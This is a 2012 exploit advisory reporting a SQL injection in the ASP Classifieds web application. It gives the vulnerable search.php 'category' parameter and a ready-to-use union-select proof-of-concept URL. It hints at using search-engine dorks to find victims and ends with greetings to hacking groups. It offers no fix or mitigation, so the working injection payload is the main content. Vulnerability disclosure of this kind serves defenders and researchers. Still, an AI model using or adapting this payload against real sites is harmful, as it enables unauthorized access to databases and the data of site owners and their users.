54 lines
No EOL
1.2 KiB
Text
54 lines
No EOL
1.2 KiB
Text
# Exploit Title: ASP Classifieds Sql Injection
|
|
# Date: 17/03/2012
|
|
# Author: r45c4l
|
|
# Email: infosecpirate@gmail.com
|
|
# Script url: http://preproject.com/pclasp/home/default.asp
|
|
# Version: N/A
|
|
# CVE : ()
|
|
|
|
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|
|
|
Product Description :
|
|
|
|
ASP Classifieds is one of the most customizable Classified ad program
|
|
that exist for ASP and Access. Unlimited Images , unlimited categories
|
|
and much much more makes it perfect for those who wants to set up a used
|
|
stamps classifieds to those wanting to show and sell real estates.
|
|
|
|
|
|
Product Cost : 58$
|
|
|
|
|
|
|
|
=======================Exploit====================================
|
|
---ICW---
|
|
|
|
|
|
|
|
[ EXPL0!T ]
|
|
|
|
SQL Injection
|
|
p0c -
|
|
http://SERVER/classi/search.php?category=[SQli]
|
|
|
|
PoC -
|
|
|
|
http://SERVER/classi/search.php?category=-1+union+all+select+version()--
|
|
|
|
[Note: Tested on demo website]
|
|
|
|
d0rk - use your brain ;)
|
|
|
|
===========================================================================
|
|
Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0,
|
|
Hoody, sam
|
|
|
|
All members of ICW, AH and darkc0de, and all Indian Hackers
|
|
|
|
|
|
|
|
Special Greetz to : b4ltazar and s1nner_01
|
|
|
|
|
|
=== End () ==== |